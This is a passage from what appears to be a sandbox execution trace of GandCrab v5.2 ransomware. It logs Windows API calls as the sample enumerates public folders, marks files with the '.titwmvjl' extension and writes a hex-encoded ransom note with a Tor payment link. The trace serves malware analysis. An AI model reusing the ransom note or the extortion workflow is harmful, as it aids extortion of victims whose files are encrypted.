a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.995] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.996] CloseHandle (hObject=0x230) returned 1 [0096.996] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.996] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.996] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x13c)) [0096.996] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.996] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.996] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.997] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Documents\\d2ca4a09d2ca4deb61a.lock") returned 50 [0096.997] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\documents\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.997] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.997] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.997] lstrlenW (lpString="C:\\Users\\Public\\Documents\\") returned 26 [0096.997] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\*") returned="C:\\Users\\Public\\Documents\\*" [0096.997] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Documents\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503238 [0096.997] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.997] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.998] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.998] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.998] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.998] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.998] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.998] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Public\\Documents\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Public\\Documents\\d2ca4a09d2ca4deb61a.lock" [0096.998] lstrlenW (lpString=".titwmvjl") returned 9 [0096.998] lstrlenW (lpString="C:\\Users\\Public\\Documents\\d2ca4a09d2ca4deb61a.lock") returned 50 [0096.998] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.999] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Documents\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 59 [0096.999] lstrlenW (lpString="C:\\Users\\Public\\Documents\\d2ca4a09d2ca4deb61a.lock") returned 50 [0096.999] lstrlenW (lpString=".lock") returned 5 [0096.999] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.999] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.999] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.999] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.999] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.999] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0096.999] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0096.999] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Documents\\desktop.ini") returned="C:\\Users\\Public\\Documents\\desktop.ini" [0096.999] lstrlenW (lpString=".titwmvjl") returned 9 [0096.999] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37 [0096.999] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.000] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Documents\\desktop.ini.titwmvjl") returned 46 [0097.000] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37 [0097.000] lstrlenW (lpString=".ini") returned 4 [0097.000] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.000] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0097.000] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0097.000] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.000] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37 [0097.000] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37 [0097.000] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0097.000] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.000] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.000] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0097.000] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0097.000] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0097.000] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\") returned="C:\\Users\\Public\\Documents\\My Music\\" [0097.000] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0097.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.001] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.001] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.001] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.001] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.001] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.002] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.002] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\\\TITWMVJL-DECRYPT.txt") returned 56 [0097.002] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\documents\\my music\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0097.003] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\